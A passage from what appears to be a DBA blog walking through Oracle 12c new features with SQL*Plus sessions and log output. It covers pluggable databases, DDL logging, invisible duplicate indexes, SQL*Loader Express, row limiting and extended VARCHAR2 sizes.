According to the Autotrace statistics this generates 280 bytes of redo (compared to 312 with temporary undo disabled).  Reduced UNDO and REDO from temporary transactions can help the performance of the database and reduce disk space for UNDO tablespaces, archive logs, and backups.  The Oracle documentation says "If database applications make use of temporary objects (using global temporary tables or temporary table transformations), it is advisable to set this parameter's value to true."

Statistics on temporary undo are available via V$TEMPUNDOSTAT.

SQL> desc V$TEMPUNDOSTAT
 Name                                      Null?    Type
 ----------------------------------------- -------- -------------
 BEGIN_TIME                                         DATE
 END_TIME                                           DATE
 UNDOTSN                                            NUMBER
 TXNCOUNT                                           NUMBER
 MAXCONCURRENCY                                     NUMBER
 MAXQUERYLEN                                        NUMBER
 MAXQUERYID                                         VARCHAR2(13)
 UNDOBLKCNT                                         NUMBER
 EXTCNT                                             NUMBER
 USCOUNT                                            NUMBER
 SSOLDERRCNT                                        NUMBER
 NOSPACEERRCNT                                      NUMBER
 CON_ID                                             NUMBER

More details here :- http://docs.oracle.com/cd/E16655_01/server.121/e17615/refrn10326.htm#REFRN10326




Parameter ENABLE_DDL_LOGGING

Sun, 2013-06-30 23:43
If the Oracle parameter ENABLE_DDL_LOGGING is enabled, DDL records are written to the ADR.

SQL> show parameter enable_ddl_logging

NAME                                 TYPE        VALUE
------------------------------------ ----------- ----------------
enable_ddl_logging                   boolean     FALSE

SQL> alter system set enable_ddl_logging=true;

System altered.

SQL> connect c##test/test@pdb1
Connected.
SQL> create view x as select * from user_views;

View created.

SQL> drop view x;

View dropped.

SQL> exit
Disconnected from Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

[oracle@rac1 log]$ pwd
/u01/app/oracle/diag/rdbms/t12/T12/log
[oracle@rac1 log]$ ls
ddl  ddl_T12.log  debug  test
[oracle@rac1 log]$ more *.log
Mon Jul 01 12:35:54 2013
diag_adl:create view x as select * from user_views
diag_adl:drop view x

[oracle@rac1 log]$ cd ddl
[oracle@rac1 ddl]$ more *.xml
<msg msg_id='kpdbLogDDL:15115:2946163730' type='UNKNOWN' group='diag_adl'
 level='16' host_id='rac1.test.com' host_addr='192.168.1.205'
 version='1'>
 <txt>create view x as select * from user_views</txt>
</msg>
<msg msg_id='kpdbLogDDL:15115:2946163730' type='UNKNOWN' group='diag_adl'
 level='16' host_id='rac1.test.com' host_addr='192.168.1.205'>
 <txt>drop view x</txt>
</msg>


Oracle 12c New Features - Clone a Plugged In Database

Sun, 2013-06-30 23:21
One of the benefits of the CDB/PDB model in Oracle 12c is that it allows rapid cloning of Pluggable Databases (PDB).  To create a clone database in previous versions of Oracle, the DBA would have needed to create a new database instance with a new set of parameters and then clone the source database files using RMAN.

In the following example I will clone database PDB1 to a new database PDB3 using only the "create pluggable database" command.  First the source database needs to be open read-only.

SQL> alter pluggable database pdb1 close immediate;

Pluggable database altered.

SQL> alter pluggable database pdb1 open read only;

Pluggable database altered.

Then clone the PDB1 to PDB3.

SQL> create pluggable database PDB3 from PDB1
FILE_NAME_CONVERT=('/u01/app/oracle/oradata/T12/pdb1','/u01/app/oracle/oradata/T12/pdb3');  

Pluggable database created.

And open both databases read-write.

SQL> alter pluggable database PDB3 open;

Pluggable database altered.

SQL> alter pluggable database PDB1 close immediate;

Pluggable database altered.

SQL> alter pluggable database PDB1 open;

Pluggable database altered.

SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB$SEED                       READ ONLY
PDB1                           READ WRITE
PDB2                           READ WRITE
PDB3                           READ WRITE



Oracle 12c New Features - Plugging and Unplugging Databases

Sun, 2013-06-30 22:35
In a previous blog post I demonstrated creating Pluggable Databases (PDB) in an Oracle 12c Container Database (CDB).  In this test I will demonstrate how easy it is to unplug a PDB from a CDB, and then plug it in again.

We currently have one PDB with name PDB1.  We will shutdown, unplug it, and drop it.

SQL> select name from v$pdbs;

NAME
------------------------------
PDB$SEED
PDB1

SQL> alter pluggable database pdb1 close immediate;

Pluggable database altered.

SQL> alter pluggable database pdb1 unplug into '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml';

Pluggable database altered.

SQL> drop pluggable database pdb1 keep datafiles;

Pluggable database dropped.

SQL> select name from v$pdbs;

NAME
------------------------------
PDB$SEED

We can now back up the database to tape for later restore, or copy the datafiles and XML file for the pluggable database to another CDB on another server and plug it in there.  In this example I will just plug the database back into the original CDB.

Before we plug it in, we first need to run DBMS_PDB.CHECK_PLUG_COMPATIBILITY to check that the PDB is compatible with the new CDB.

SQL> set serveroutput on
SQL> DECLARE
  2     compatible BOOLEAN := FALSE;
  3  BEGIN
  4     compatible := DBMS_PDB.CHECK_PLUG_COMPATIBILITY(
  5          pdb_descr_file => '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml');
  6     if compatible then
  7        DBMS_OUTPUT.PUT_LINE('Is pluggable PDB2 compatible? YES');
  8     else DBMS_OUTPUT.PUT_LINE('Is pluggable PDB2 compatible? NO');
  9     end if;
 10  END;
 11  /
Is pluggable PDB2 compatible? YES

PL/SQL procedure successfully completed.

As the PDB is compatible with the CDB we can proceed to plug it in. 

SQL> create pluggable database PDB1 using '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml' NOCOPY TEMPFILE REUSE;

Pluggable database created.

SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB$SEED                       READ ONLY
PDB1                           MOUNTED

SQL> alter session set container=PDB1;

Session altered.

SQL> alter database open;

Database altered.

SQL> connect test/test@pdb1;
Connected.


SQL> show con_name

CON_NAME
------------------------------
PDB1

We are now able to log in to the plugged-in database.

The Alert log entries for these operations are as follows :-

Mon Jul 01 11:14:31 2013
alter pluggable database pdb1 close immediate
Mon Jul 01 11:14:31 2013
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
Pluggable database PDB1 closed
Completed: alter pluggable database pdb1 close immediate
alter pluggable database pdb1 unplug into '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml'
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
Completed: alter pluggable database pdb1 unplug into '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml'
drop pluggable database pdb1 keep datafiles
Mon Jul 01 11:15:02 2013
Deleted file /u01/app/oracle/oradata/T12/pdb1/pdbseed_temp01.dbf
Completed: drop pluggable database pdb1 keep datafiles
create pluggable database PDB1 using '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml' NOCOPY TEMPFILE REUSE
Mon Jul 01 11:20:45 2013
****************************************************************
Pluggable Database PDB1 with pdb id - 3 is created as UNUSABLE.
If any errors are encountered before the pdb is marked as NEW,
then the pdb must be dropped
****************************************************************
Deleting old file#10 from file$
Deleting old file#11 from file$
Adding new file#12 to file$(old file#10)
Adding new file#13 to file$(old file#11)
Successfully created internal service pdb1 at open
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
****************************************************************

Post plug operations are now complete.
Pluggable database PDB1 with pdb id - 3 is now marked as NEW.
****************************************************************
Completed: create pluggable database PDB1 using '/u01/app/oracle/oradata/T12/pdb1/pdb1.xml' NOCOPY TEMPFILE REUSE
Mon Jul 01 11:29:00 2013
alter database open
Mon Jul 01 11:29:00 2013
Pluggable database PDB1 dictionary check beginning
Pluggable Database PDB1 Dictionary check complete
Opening pdb PDB1 (3) with no Resource Manager plan active

XDB installed.

XDB initialized.
Pluggable database PDB1 opened read write
Completed: alter database open







Oracle 12c New Features - Container and Pluggable Databases

Sun, 2013-06-30 20:30
Oracle 12c introduces the "Multitenant Architecture", which allows consolidation of databases via Container Databases (CDB) and Pluggable Databases (PDB).

The CDB database owns the SGA and running processes, and the PDB databases are serviced by those resources.  This new architecture will be a big change for DBAs experienced in managing earlier versions of the Oracle database, so it is worth taking the time to read the documentation and test extensively before using these new features.  The theory is that many databases sharing one SGA and set of processes should be more efficient than multiple individually managed memory segments, so this feature is specifically aimed at clouds and large companies.


I used the DBCA utility to create a CDB called T12, which also created a small PDB$SEED database.  DBCA is easy to run, and similar to previous versions, so I won't show screen shots here.  It is also possible to create a CDB database using the CREATE DATABASE statement along with the new ENABLE PLUGGABLE DATABASE clause.  


When managing CDBs and PDBs it is important to ensure you know what container you are currently working on.  By default when you login you will end up in CDB$ROOT.  


[oracle@rac1 admin]$ ps -ef | grep pmon
oracle    7830     1  0 09:08 ?        00:00:00 ora_pmon_T12

[oracle@rac1 admin]$ echo $ORACLE_SID
T12

[oracle@rac1 admin]$ sqlplus / as sysdba

SQL*Plus: Release 12.1.0.1.0 Production on Mon Jul 1 09:11:11 2013
Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Connected to:

Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

SQL> show con_name

CON_NAME
------------------------------
CDB$ROOT

SQL> show con_id

CON_ID
------------------------------
1

By selecting from v$database we can see that we are currently in a CDB.

SQL> select DBID, name, CDB, CON_ID, CON_DBID from v$database;

      DBID NAME      CDB     CON_ID   CON_DBID
---------- --------- --- ---------- ----------
1216820329 T12       YES          0 1216820329

We can select PDB from dba_services to check what PDBs exist.  In this case we have not created any PDBs, so only the CDB T12 is listed against CDB$ROOT.

SQL> select name, pdb from dba_services;

NAME                PDB
----------------------------------------------------------------
SYS$BACKGROUND      CDB$ROOT
SYS$USERS           CDB$ROOT
T12XDB              CDB$ROOT
T12                 CDB$ROOT

SQL> select name, con_id from v$active_services;

NAME                                                  CON_ID
---------------------------------------------------------------- 
T12XDB                                                1
T12                                                   1
SYS$BACKGROUND                                        1
SYS$USERS                                             1

Create a tnsnames.ora entry for connecting to CDB service T12.

T12 =
 (DESCRIPTION =
 (ADDRESS_LIST =
 (ADDRESS = (PROTOCOL = TCP)(HOST = rac1.test.com)(PORT = 1521)))
 (CONNECT_DATA =
 (SERVICE_NAME = T12)
 )
  )

When we try to create a user, we find that in a CDB we are not allowed to create "local" users, but can only create "common" users with usernames starting with "C##".

SQL> create user test identified by test;
create user test identified by test
            *
ERROR at line 1:
ORA-65096: invalid common user or role name

SQL> !oerr ora 65096
65096, 00000, "invalid common user or role name"
// *Cause:  An attempt was made to create a common user or role with a name
//          that wass not valid for common users or roles.  In addition to
//          the usual rules for user and role names, common user and role
//          names must start with C## or c## and consist only of ASCII
//          characters.
// *Action: Specify a valid common user or role name.
//

SQL> create user test identified by test container=current;
create user test identified by test container=current
                               *
ERROR at line 1:
ORA-65049: creation of local user or role is not allowed in CDB$ROOT

SQL> create user c##test identified by test;

User created.

There are now additional data dictionary views to help manage the PDB and CDB databases (their names include PDB and CDB).  You will also notice that many data dictionary views now contain a CON_ID column, which allows DBAs to check details for a specific CDB or PDB.

If we select from v$datafile in the new container database we can see that in addition to the datafiles for the CDB T12, there are datafiles listed for database "pdbseed".  The PDB$SEED database is created at the same time as the CDB and can be used as a source to create PDB databases.


SQL> select name, con_id, plugged_in from v$datafile order by 2;

NAME                                           CON_ID PLUGGED_IN
-------------------------------------------------- ---------- ---
/u01/app/oracle/oradata/T12/system01.dbf            1          0
/u01/app/oracle/oradata/T12/sysaux01.dbf            1          0
/u01/app/oracle/oradata/T12/undotbs01.dbf           1          0
/u01/app/oracle/oradata/T12/users01.dbf             1          0
/u01/app/oracle/oradata/T12/pdbseed/system01.dbf    2          0
/u01/app/oracle/oradata/T12/pdbseed/sysaux01.dbf    2          0

6 rows selected.

The PDB$SEED database is mounted read only, so it is possible to explore it, but there are limits to what you can do with this DB.

SQL> select con_id, name, open_mode from v$pdbs;

    CON_ID NAME                                        OPEN_MODE
---------- ------------------------------------------- ---------
         2 PDB$SEED                                    READ ONLY

SQL> alter session set container=PDB$SEED;

Session altered.

SQL> select name from v$database;

NAME
---------
T12

SQL> show con_name

CON_NAME
------------------------------
PDB$SEED

SQL> show con_id

CON_ID
------------------------------
2

SQL> select open_mode from v$database;

OPEN_MODE
--------------------
READ ONLY

SQL> shutdown;
ORA-65017: seed pluggable database may not be dropped or altered

To create our own read-write PDB as a copy of the PDB$SEED database we just need to execute the "create pluggable database" command.

SQL> create pluggable database PDB1 admin user pdb1_admin identified by password roles = (DBA) FILE_NAME_CONVERT=('/u01/app/oracle/oradata/T12/pdbseed','/u01/app/oracle/oradata/T12/pdb1');

Pluggable database created.


SQL> select pdb_name, status from cdb_pdbs;

PDB_NAME      STATUS
----------------------------------------------------------------
PDB$SEED      NORMAL
PDB1          NEW

SQL> select name, con_id from v$active_services order by 1;

NAME                                           CON_ID
---------------------------------------------------------------- 
SYS$BACKGROUND                                 1
SYS$USERS                                      1
T12                                            1
T12XDB                                         1
pdb1                                           3

SQL> select name from v$datafile where con_id=3;

NAME
-----------------------------------------------------------------
/u01/app/oracle/oradata/T12/pdb1/system01.dbf
/u01/app/oracle/oradata/T12/pdb1/sysaux01.dbf

SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB$SEED                       READ ONLY
PDB1                           MOUNTED

We can see from the above that the new PDB was created in MOUNTED state.  We will need to open it if we want to use it.  When we look in the CDB alert log we can see the following :-

Mon Jul 01 10:02:30 2013
create pluggable database PDB1 admin user pdb1_admin identified by * roles = (DBA) FILE_NAME_CONVERT=('/u01/app/oracle/oradata/T12/pdbseed','/u01/app/oracle/oradata/T12/pdb1')
Mon Jul 01 10:02:53 2013
****************************************************************
Pluggable Database PDB1 with pdb id - 3 is created as UNUSABLE.
If any errors are encountered before the pdb is marked as NEW,
then the pdb must be dropped
****************************************************************
Deleting old file#5 from file$
Deleting old file#7 from file$
Adding new file#10 to file$(old file#5)
Adding new file#11 to file$(old file#7)
Successfully created internal service pdb1 at open
ALTER SYSTEM: Flushing buffer cache inst=0 container=3 local
****************************************************************
Post plug operations are now complete.
Pluggable database PDB1 with pdb id - 3 is now marked as NEW.
****************************************************************

Completed: create pluggable database PDB1 admin user pdb1_admin identified by * roles = (DBA) FILE_NAME_CONVERT=('/u01/app/oracle/oradata/T12/pdbseed','/u01/app/oracle/oradata/T12/pdb1')

We can open databases individually as follows, or open all PDBs using "alter pluggable database all open;"

SQL> alter session set container=PDB1;

Session altered.

SQL> show con_name

CON_NAME
------------------------------
PDB1

SQL> alter database open;

Database altered.

SQL> select name, open_mode from v$pdbs;

NAME                           OPEN_MODE
------------------------------ ----------
PDB1                           READ WRITE

We can see the following in the CDB alert log.

alter database open
Mon Jul 01 10:12:50 2013
Pluggable database PDB1 dictionary check beginning
Pluggable Database PDB1 Dictionary check complete
Opening pdb PDB1 (3) with no Resource Manager plan active

XDB installed.


XDB initialized.

Pluggable database PDB1 opened read write

Completed: alter database open

Create a tnsnames.ora entry for the new PDB using the default service PDB1.

PDB1 =
 (DESCRIPTION =
 (ADDRESS_LIST =
 (ADDRESS = (PROTOCOL = TCP)(HOST = rac1.test.com)(PORT = 1521)))
 (CONNECT_DATA =
 (SERVICE_NAME = PDB1)
 )
  )

Now that we have created a PDB we can create "local" users.

SQL> show con_name

CON_NAME
------------------------------
PDB1

SQL> create user test identified by test;

User created.

SQL> grant create session to test;

Grant succeeded.

It is also possible to grant privileges in the PDB for the "common" users that exist in the CDB.

SQL> grant create session to C##TEST container=ALL;


Grant succeeded.

We can now connect directly to the PDB1 pluggable database using both the "local" and "common" users.

SQL> connect test/test@PDB1
Connected.
SQL> show con_name

CON_NAME
------------------------------
PDB1

SQL> connect C##TEST/test@PDB1
Connected.

SQL> show con_name

CON_NAME
------------------------------
PDB1

When logged into a PDB, many data dictionary views restrict our view of the world via CON_ID so that we can't see records relating to other PDBs.  We can see from the following selects that PDB1 uses the UNDO and redo files from the container database, but has its own SYSTEM, SYSAUX, and TEMP files.

SQL> select name from v$datafile;

NAME
-----------------------------------------------------------------
/u01/app/oracle/oradata/T12/undotbs01.dbf
/u01/app/oracle/oradata/T12/pdb1/system01.dbf
/u01/app/oracle/oradata/T12/pdb1/sysaux01.dbf

SQL> select name from v$tempfile;

NAME
-----------------------------------------------------------------
/u01/app/oracle/oradata/T12/pdb1/pdbseed_temp01.dbf

SQL> select member from v$logfile;

MEMBER
-----------------------------------------------------------------
/u01/app/oracle/oradata/T12/redo03.log
/u01/app/oracle/oradata/T12/redo02.log
/u01/app/oracle/oradata/T12/redo01.log

PDB databases can be created from a seed database as demonstrated above, cloned from other PDB databases, or plugged in from previously unplugged PDBs or converted non-CDB databases.  In addition to creating new PDB databases, we can also drop, rename, clone, unplug, plug, back up, restore, and duplicate them.  Check the Oracle documentation for details.

More details here :- Introduction to the Multitenant Architecture

Oracle 12c New Features - multiple indexes on the same set of columns

Fri, 2013-06-28 00:29
With Oracle 12c it is now possible to have multiple indexes on the same set of columns, as long as there is a difference between the indexes (index type, partitioning, etc.) and only one of them is visible.

This makes it possible to quickly change index strategies with minimal impact on applications.

For this example I will first create a test partitioned table.

SQL> CREATE TABLE test_range
(id  NUMBER(5),
att1 char(1),
att2 char(1),
att3 char(1))
PARTITION BY RANGE(id)
(
PARTITION id_10 VALUES LESS THAN(10),
PARTITION id_20 VALUES LESS THAN(20)
);  

Table created.

Now create a global index on ATT1.

SQL> create index att1_global on test_range(att1) global;

Index created.

Try to create another index on ATT1 with local partitioning, and it fails because the existing index is still visible.

SQL> create index att1_local on test_range(att1) local;
create index att1_local on test_range(att1) local
                                      *
ERROR at line 1:
ORA-01408: such column list already indexed

Try to create an invisible global index on ATT1 and it fails because the structure is the same as the existing index.

SQL> create index att1_global2 on test_range(att1) global invisible;
create index att1_global2 on test_range(att1) global invisible
                                        *
ERROR at line 1:
ORA-01408: such column list already indexed

Try to create an invisible index with local partitioning and it is successful.

SQL> create index att1_local on test_range(att1) local invisible;

Index created.

Try to make the locally partitioned index visible, and it fails because there is another visible index with the same columns.

SQL> alter index att1_local visible;
alter index att1_local visible
*
ERROR at line 1:
ORA-14147: There is an existing VISIBLE index defined on the same set of
columns.

We need to make the existing index invisible first, then make the new index visible.  With this method we can easily test multiple indexing strategies without needing long outages to drop and recreate indexes.

SQL> alter index att1_global invisible;

Index altered.

SQL> alter index att1_local visible;

Index altered.


Oracle 12c New Features - SQL*Loader Express

Thu, 2013-06-27 23:06
Oracle 12c introduces SQL*Loader Express, which allows users to run sqlldr with minimal configuration.

The following example shows loading records into table EMPLOYEE from CSV file EMPLOYEE.dat without having to create a control file.


SQL> create table EMPLOYEE (id integer primary key, name varchar2(10));

Table created.

SQL> exit
Disconnected from Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

[oracle@rac1 admin]$ more EMPLOYEE.dat
1,Adam
2,Ben
3,Colin
4,Dean
5,Evan
6,Frank
7,Greg
8,Hank
9,Ian
10,Jack
[oracle@rac1 admin]$ sqlldr test/test TABLE=EMPLOYEE

SQL*Loader: Release 12.1.0.1.0 - Production on Fri Jun 28 11:58:11 2013

Copyright (c) 1982, 2013, Oracle and/or its affiliates.  All rights reserved.

Express Mode Load, Table: EMPLOYEE
Path used:      External Table, DEGREE_OF_PARALLELISM=AUTO
SQL*Loader-816: error creating temporary directory object SYS_SQLLDR_XT_TMPDIR_00000 for file EMPLOYEE.dat
ORA-01031: insufficient privileges
SQL*Loader-579: switching to direct path for the load
SQL*Loader-583: ignoring trim setting with direct path, using value of LDRTRIM
SQL*Loader-584: ignoring DEGREE_OF_PARALLELISM setting with direct path, using value of NONE
Express Mode Load, Table: EMPLOYEE
Path used:      Direct

Load completed - logical record count 10.

Table EMPLOYEE:
  10 Rows successfully loaded.

Check the log file:
  EMPLOYEE.log
for more information about the load.

[oracle@rac1 admin]$ ls EMPLOYEE*
EMPLOYEE.dat  EMPLOYEE.log

[oracle@rac1 admin]$ more EMPLOYEE.log

SQL*Loader: Release 12.1.0.1.0 - Production on Fri Jun 28 11:58:11 2013

Copyright (c) 1982, 2013, Oracle and/or its affiliates.  All rights reserved.

Express Mode Load, Table: EMPLOYEE
Data File:      EMPLOYEE.dat
  Bad File:     EMPLOYEE_%p.bad
  Discard File:  none specified

 (Allow all discards)

Number to load: ALL
Number to skip: 0
Errors allowed: 50
Continuation:    none specified
Path used:      External Table

Table EMPLOYEE, loaded from every logical record.
Insert option in effect for this table: APPEND

Column Name                Position   Len   Term Encl Datatype
-------------------------- ---------- ----- ---- ---- ---------
ID                         FIRST      *     ,         CHARACTER
NAME                       NEXT       *     ,         CHARACTER

Generated control file for possible reuse:
OPTIONS(EXTERNAL_TABLE=EXECUTE, TRIM=LRTRIM)
LOAD DATA
INFILE 'EMPLOYEE'
APPEND
INTO TABLE EMPLOYEE
FIELDS TERMINATED BY ","
(
  ID,
  NAME
)
End of generated control file for possible reuse.

SQL*Loader-816: error creating temporary directory object SYS_SQLLDR_XT_TMPDIR_00000 for file EMPLOYEE.dat
ORA-01031: insufficient privileges

----------------------------------------------------------------
SQL*Loader-579: switching to direct path for the load
SQL*Loader-583: ignoring trim setting with direct path, using value of LDRTRIM
SQL*Loader-584: ignoring DEGREE_OF_PARALLELISM setting with direct path, using value of NONE
----------------------------------------------------------------

Express Mode Load, Table: EMPLOYEE
Data File:      EMPLOYEE.dat
  Bad File:     EMPLOYEE.bad
  Discard File:  none specified

 (Allow all discards)

Number to load: ALL
Number to skip: 0
Errors allowed: 50
Continuation:    none specified
Path used:      Direct

Table EMPLOYEE, loaded from every logical record.
Insert option in effect for this table: APPEND

   Column Name        Position   Len   Term Encl Datatype
--------------------- ---------- ----- ---- ---- ----------------
ID                    FIRST      *     ,         CHARACTER
NAME                  NEXT       *     ,         CHARACTER

Generated control file for possible reuse:
OPTIONS(DIRECT=TRUE)
LOAD DATA
INFILE 'EMPLOYEE'
APPEND
INTO TABLE EMPLOYEE
FIELDS TERMINATED BY ","
(
  ID,
  NAME
)
End of generated control file for possible reuse.

The following index(es) on table EMPLOYEE were processed:
index TEST.SYS_C009860 loaded successfully with 10 keys

Table EMPLOYEE:
  10 Rows successfully loaded.
  0 Rows not loaded due to data errors.
  0 Rows not loaded because all WHEN clauses were failed.
  0 Rows not loaded because all fields were null.

Bind array size not used in direct path.
Column array  rows :    5000
Stream buffer bytes:  256000
Read   buffer bytes: 1048576

Total logical records skipped:          0
Total logical records read:            10
Total logical records rejected:         0
Total logical records discarded:        0
Total stream buffers loaded by SQL*Loader main thread:        1
Total stream buffers loaded by SQL*Loader load thread:        0

Run began on Fri Jun 28 11:58:11 2013
Run ended on Fri Jun 28 11:58:12 2013

Elapsed time was:     00:00:01.27
CPU time was:         00:00:00.02


[oracle@rac1 admin]$ sqlplus test/test

SQL*Plus: Release 12.1.0.1.0 Production on Fri Jun 28 12:05:49 2013

Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Last Successful login time: Fri Jun 28 2013 11:58:11 +08:00

Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

SQL> select * from employee;

        ID NAME
---------- ----------
         1 Adam
         2 Ben
         3 Colin
         4 Dean
         5 Evan
         6 Frank
         7 Greg
         8 Hank
         9 Ian
        10 Jack


10 rows selected.
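
Note the SQL*Loader-816 / ORA-01031 messages above: express mode first tries the external table path, which requires creating a temporary directory object, and falls back to direct path when the user lacks the privilege.  If you want the external table load path (and its DEGREE_OF_PARALLELISM=AUTO), one option is to grant the required privilege first; a sketch, bearing in mind that CREATE ANY DIRECTORY is a powerful privilege to hand out:

SQL> grant create any directory to test;

Grant succeeded.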


Categories: DBA Blogs

Oracle 12c New Features - FETCH FIRST ROWS, OFFSET

Thu, 2013-06-27 22:20
Oracle 12c introduces SQL syntax for row limiting (FETCH FIRST / OFFSET).  This makes it easier to retrieve records in sets for display or processing.

Example :-

create table employee (id integer primary key, name varchar2(10));
insert into employee values (1,'Adam');
insert into employee values (2,'Ben');
insert into employee values (3,'Colin');
insert into employee values (4,'Dean');
insert into employee values (5,'Evan');
insert into employee values (6,'Frank');
insert into employee values (7,'Greg');
insert into employee values (8,'Hank');
insert into employee values (9,'Ian');
insert into employee values (10,'Jack');
commit;

SQL> select * from employee order by id fetch first 3 rows only;

        ID NAME
---------- ----------
         1 Adam
         2 Ben
         3 Colin

SQL> select * from employee order by id offset 3 rows fetch next 3 rows only;

        ID NAME
---------- ----------
         4 Dean
         5 Evan
         6 Frank

SQL> select * from employee order by id fetch first 50 percent rows only;

        ID NAME
---------- ----------
         1 Adam
         2 Ben
         3 Colin
         4 Dean
         5 Evan
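
The row limiting clause also supports WITH TIES, which returns any additional rows that tie with the last fetched row on the ORDER BY columns.  A sketch against the same table (with unique IDs the result matches ROWS ONLY, but with duplicate sort keys the tied rows would also be returned):

SQL> select * from employee order by id fetch first 3 rows with ties;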



Categories: DBA Blogs

Oracle 12c New Features - Extended Datatypes VARCHAR2 32767 bytes

Thu, 2013-06-27 21:55
In Oracle 12c it is now possible to create VARCHAR2, NVARCHAR2, and RAW columns of up to 32767 bytes.

This is controlled by the new parameter MAX_STRING_SIZE.  It defaults to STANDARD, but if you set it to EXTENDED you can use the expanded sizes.  Consider this carefully, as the change cannot be reverted, and increased column sizes will affect any applications that use the data in variables and parameters, and can limit the use of partitioning and indexes on the extended datatypes.

In addition to setting MAX_STRING_SIZE=EXTENDED you also need to start the database in "upgrade" mode and run utl32k.sql (found in $ORACLE_HOME/rdbms/admin).  Also be aware that if you are running a CDB with PDBs you may need to upgrade each container individually, including the seed PDB.

SQL> alter system set max_string_size=EXTENDED scope=spfile;

System altered.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.
SQL> startup upgrade
ORACLE instance started.

Total System Global Area 1636814848 bytes
Fixed Size                  2288968 bytes
Variable Size            1056965304 bytes
Database Buffers          570425344 bytes
Redo Buffers                7135232 bytes
Database mounted.
Database opened.
SQL> @utl32k.sql

Session altered.

DOC>#######################################################################
DOC>#######################################################################
DOC>   The following statement will cause an "ORA-01722: invalid number"
DOC>   error if the database has not been opened for UPGRADE.
DOC>
DOC>   Perform a "SHUTDOWN ABORT"  and
DOC>   restart using UPGRADE.
DOC>#######################################################################
DOC>#######################################################################
DOC>#

no rows selected

DOC>#######################################################################
DOC>#######################################################################
DOC>   The following statement will cause an "ORA-01722: invalid number"
DOC>   error if the database does not have compatible >= 12.0.0
DOC>
DOC>   Set compatible >= 12.0.0 and retry.
DOC>#######################################################################
DOC>#######################################################################
DOC>#

PL/SQL procedure successfully completed.


Session altered.


0 rows updated.


Commit complete.


System altered.


PL/SQL procedure successfully completed.


Commit complete.


System altered.


Session altered.


PL/SQL procedure successfully completed.

No errors.

Session altered.


PL/SQL procedure successfully completed.


Commit complete.


Package altered.


TIMESTAMP
--------------------------------------------------------------------------------
COMP_TIMESTAMP UTLRP_BGN  2013-06-28 10:47:30

DOC>   The following PL/SQL block invokes UTL_RECOMP to recompile invalid
DOC>   objects in the database. Recompilation time is proportional to the
DOC>   number of invalid objects in the database, so this command may take
DOC>   a long time to execute on a database with a large number of invalid
DOC>   objects.
DOC>
DOC>   Use the following queries to track recompilation progress:
DOC>
DOC>   1. Query returning the number of invalid objects remaining. This
DOC>      number should decrease with time.
DOC>         SELECT COUNT(*) FROM obj$ WHERE status IN (4, 5, 6);
DOC>
DOC>   2. Query returning the number of objects compiled so far. This number
DOC>      should increase with time.
DOC>         SELECT COUNT(*) FROM UTL_RECOMP_COMPILED;
DOC>
DOC>   This script automatically chooses serial or parallel recompilation
DOC>   based on the number of CPUs available (parameter cpu_count) multiplied
DOC>   by the number of threads per CPU (parameter parallel_threads_per_cpu).
DOC>   On RAC, this number is added across all RAC nodes.
DOC>
DOC>   UTL_RECOMP uses DBMS_SCHEDULER to create jobs for parallel
DOC>   recompilation. Jobs are created without instance affinity so that they
DOC>   can migrate across RAC nodes. Use the following queries to verify
DOC>   whether UTL_RECOMP jobs are being created and run correctly:
DOC>
DOC>   1. Query showing jobs created by UTL_RECOMP
DOC>         SELECT job_name FROM dba_scheduler_jobs
DOC>            WHERE job_name like 'UTL_RECOMP_SLAVE_%';
DOC>
DOC>   2. Query showing UTL_RECOMP jobs that are running
DOC>         SELECT job_name FROM dba_scheduler_running_jobs
DOC>            WHERE job_name like 'UTL_RECOMP_SLAVE_%';
DOC>#

PL/SQL procedure successfully completed.


TIMESTAMP
--------------------------------------------------------------------------------
COMP_TIMESTAMP UTLRP_END  2013-06-28 10:47:32

DOC> The following query reports the number of objects that have compiled
DOC> with errors.
DOC>
DOC> If the number is higher than expected, please examine the error
DOC> messages reported with each object (using SHOW ERRORS) to see if they
DOC> point to system misconfiguration or resource constraints that must be
DOC> fixed before attempting to recompile these objects.
DOC>#

OBJECTS WITH ERRORS
-------------------
                  0

DOC> The following query reports the number of errors caught during
DOC> recompilation. If this number is non-zero, please query the error
DOC> messages in the table UTL_RECOMP_ERRORS to see if any of these errors
DOC> are due to misconfiguration or resource constraints that must be
DOC> fixed before objects can compile successfully.
DOC>#

ERRORS DURING RECOMPILATION
---------------------------
                          0


Function created.


PL/SQL procedure successfully completed.


Function dropped.

...Database user "SYS", database schema "APEX_040200", user# "98" 10:47:42
...Compiled 0 out of 2998 objects considered, 0 failed compilation 10:47:43
...263 packages
...255 package bodies
...453 tables
...11 functions
...16 procedures
...3 sequences
...458 triggers
...1322 indexes
...207 views
...0 libraries
...6 types
...0 type bodies
...0 operators
...0 index types
...Begin key object existence check 10:47:43
...Completed key object existence check 10:47:43
...Setting DBMS Registry 10:47:43
...Setting DBMS Registry Complete 10:47:43
...Exiting validate 10:47:43

PL/SQL procedure successfully completed.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.
SQL> startup
ORACLE instance started.

Total System Global Area 1636814848 bytes
Fixed Size                  2288968 bytes
